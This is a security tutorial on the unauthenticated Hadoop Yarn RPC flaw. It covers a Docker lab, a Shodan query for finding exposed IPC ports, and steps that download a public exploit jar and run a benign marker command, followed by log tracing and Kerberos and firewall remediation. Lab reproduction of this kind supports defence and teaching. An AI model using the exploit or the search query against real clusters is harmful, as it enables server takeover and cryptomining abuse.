Understanding and Mitigating Security Risks in Hadoop Yarn: RPC Service Vulnerabilities and Exploits

Hadoop Yarn Vulnerability Description

Hadoop Yarn, one of the core components of Hadoop, allocates cluster resources to applications and schedules their tasks across the cluster nodes. By default, Hadoop Yarn exposes its RPC services externally without authentication, so an attacker who can reach the RPC port can execute arbitrary commands and take control of the server. In addition, because the RPC services use a different access control mechanism from the REST API, the RPC port remains accessible without authorization even when authentication and authorization are enabled for the REST API.

Hadoop Yarn Vulnerability Affected Versions

All versions of Apache Hadoop

Shodan Search Syntax: Hadoop Yarn

http.html:"HTTP request to a Hadoop IPC port"

Vulnerability Environment Setup

Since this vulnerability affects all versions, we can reuse the vulhub environment that was previously set up for the unauthorized REST API vulnerability.

https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn

You need to modify the docker-compose.yml file to add a port mapping for the RPC port (8032), so that it is reachable from the host.
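
As an alternative to editing the file in place, the mapping can be placed in a docker-compose.override.yml next to it, which Compose merges with the main file automatically. The sketch below is only an illustration: it assumes the ResourceManager service is named resourcemanager in the vulhub file and that the RPC port is 8032, and write_rpc_override is a hypothetical helper name. Check both assumptions against your copy of docker-compose.yml. If that file declares a version, older docker-compose releases may also require the same version line at the top of the override.

```shell
# Hypothetical helper: write a Compose override file that publishes the
# Yarn RPC port. ASSUMPTIONS: the service is called "resourcemanager" and
# the RPC port is 8032; adjust both to match the actual docker-compose.yml.
write_rpc_override() {
    target="${1:-docker-compose.override.yml}"
    cat > "$target" <<'EOF'
services:
  resourcemanager:
    ports:
      - "8032:8032"
EOF
}

# Usage (in the unauthorized-yarn directory, before starting the stack):
#   write_rpc_override
```

Compose appends the ports listed in an override file to those of the main file, so any mapping already defined there is kept.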

docker-compose up -d

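Send a curl request to port 8032 to confirm that the RPC service is reachable. The response below shows that the port is a Hadoop IPC port.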

[root@VM-0-15-centos unauthorized-yarn]# curl 127.0.0.1:8032
It looks like you are making an HTTP request to a Hadoop IPC port. This is not the correct port for the web interface on this daemon.
[root@VM-0-15-centos unauthorized-yarn]# 
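
The same check can be scripted when several hosts or ports need to be tested. The following is a minimal sketch that looks for the banner text shown in the response above; the function names is_hadoop_ipc_banner and probe_ipc_port are hypothetical, and the 5-second timeout is an arbitrary choice.

```shell
# Succeeds if the text on stdin contains the message that a Hadoop IPC
# port returns to an HTTP client (the banner in the curl output above).
is_hadoop_ipc_banner() {
    grep -q 'HTTP request to a Hadoop IPC port'
}

# Hypothetical wrapper: probe host:port with curl and classify the reply.
# --max-time keeps the probe from hanging on filtered ports.
probe_ipc_port() {
    if curl -s --max-time 5 "http://$1/" | is_hadoop_ipc_banner; then
        echo "$1: Hadoop IPC port reachable"
    else
        echo "$1: no Hadoop IPC banner"
    fi
}

# Usage:
#   probe_ipc_port 127.0.0.1:8032
```

A reachable banner only shows that the port is exposed; it does not by itself prove that unauthenticated job submission is possible.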

Vulnerability Exploit

https://github.com/cckuailong/YarnRpcRCE

Vulnerability Reproduction

wget https://github.com/cckuailong/YarnRpcRCE/releases/download/0.0.1/YarnRpcUnauth.jar
# Create a marker file on the target; replace ip:port with the RPC address (for example 127.0.0.1:8032)
java -jar YarnRpcUnauth.jar ip:port "touch /tmp/success"

Because the environment is started with docker-compose, it consists of four containers, and the command does not necessarily run in the container that exposes the RPC port. List /tmp in each container to find the created file:

docker ps | grep unauthorizedyarn | awk '{print $1}' | xargs -I % docker exec -i % ls -l /tmp

Attack Tracing and Investigation

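The main logs to check are those of the following key components:

  • ResourceManager log
  • NodeManager log
  • Container log

They are located under the following directory (the exact path may differ by installation):

/var/log/hadoop-yarn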

If Hadoop is running via docker, you can investigate using docker logs.

docker-compose logs | grep nodemanager.ContainerExecutor

In this environment, Hadoop was compromised and used for cryptocurrency mining shortly after startup.

However, the logs did not record the attacker’s IP address.
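
To follow up on suspicious entries, it can help to list the application IDs that appear in the logs and then inspect each one. The sketch below assumes the usual application_<timestamp>_<sequence> ID format, and extract_app_ids is a hypothetical helper name, not part of Hadoop.

```shell
# Read log text on stdin and print each distinct Yarn application ID once.
# ASSUMPTION: IDs follow the application_<digits>_<digits> pattern.
extract_app_ids() {
    grep -o 'application_[0-9][0-9]*_[0-9][0-9]*' | sort -u
}

# Usage:
#   docker-compose logs | extract_app_ids
```

Each ID can then be examined further, for example with yarn application -status followed by the ID, to see who submitted the application and when.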

Remediation

  1. Enable Kerberos authentication, as officially recommended by Apache Hadoop (hadoop.security.authentication set to kerberos in core-site.xml).
  2. Use iptables or security groups to restrict the Hadoop RPC service port to trusted addresses only.
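
As an illustration of the second item, the sketch below prints (but does not apply) a pair of iptables rules that accept the RPC port from one trusted range and drop all other traffic to it. The helper name print_rpc_rules, port 8032, and the 10.0.0.0/8 range in the usage line are assumptions for the example. The INPUT rules shown fit a Hadoop daemon running directly on the host; ports published by Docker are forwarded rather than delivered to INPUT, so a Docker deployment would need equivalent rules in the DOCKER-USER chain instead.

```shell
# Print iptables rules that restrict a TCP port to one trusted source range.
# Nothing is applied; review the output before running it as root.
print_rpc_rules() {
    port="$1"      # RPC port to protect, e.g. 8032 (assumed)
    trusted="$2"   # trusted source range in CIDR notation (assumed)
    echo "iptables -A INPUT -p tcp --dport $port -s $trusted -j ACCEPT"
    echo "iptables -A INPUT -p tcp --dport $port -j DROP"
}

# Usage:
#   print_rpc_rules 8032 10.0.0.0/8
```

The order matters: the ACCEPT rule must be appended before the DROP rule, because iptables evaluates a chain from top to bottom and stops at the first match.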